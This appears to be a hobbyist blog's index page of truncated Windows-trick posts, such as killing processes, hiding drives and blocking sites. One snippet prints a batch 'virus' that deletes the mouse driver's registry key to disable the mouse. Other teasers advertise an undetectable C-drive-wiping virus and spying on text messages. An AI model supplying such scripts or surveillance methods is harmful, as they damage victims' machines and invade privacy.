1 - open cmd 2 - type " tasklist " 3- Type " taskkill pid/ 8920 "
? 8920 ? is the pid number of the program id you want to kill or close !
&nbs...
Sunday, September 13, 2015
How to Hide Hard Drive
Step 1 - open Cmd
Step 2- Type "Dіskраrt " and hit enter
Step 3 - Now you have to type ” lіst vоlumе ” аnd Hit Enter to see the list of all drives details
Step 4 - Now i have some personal data in...
How to Block any Website
1- Go to C:\Windows\System32\drivers\etc
2- Open hosts file in notepad 3- Write 127.0.0.1 www.googl.com
and save ! now google,com will be blocked
# Copyright (c) 1993-2009 Microsoft Corp.## This is a sample HOSTS...
Tuesday, September 8, 2015
Create a virus that disable mouse
How To Disable Mouse
1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
...
Make Dangerous Virus In A Minute
What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.
How to Make the virus ?
1. Open Notepad and...
Use Web Browsers As Text Editor
In this tutorial i will show you a simple and interesting trick to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.
How To Do ?
1 Copy below code in browser Url...
100+ Run Commands List
Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character...
Sunday, September 6, 2015
Dancing Keyboard Led
In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep...
Hide Files Behind The Images

There are some important files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To...
Tuesday, September 1, 2015
Android Browser All Versions - Address Bar Spoofing Vulnerability - CVE-2015-3830
Introduction
Google security team themselves state that "We recognize that the address bar is the only reliable security indicator in modern browsers" and if the only reliable security indicator could be controlled by an attacker it could carry adverse affects,...
How to Spy on Text Messages
It seems that in recent years most of society, especially the younger generations, have turned to texting as their preferred mode of conversation. The infinite ability to communicate with other people around the world effortlessly has become a growing concern for parents and...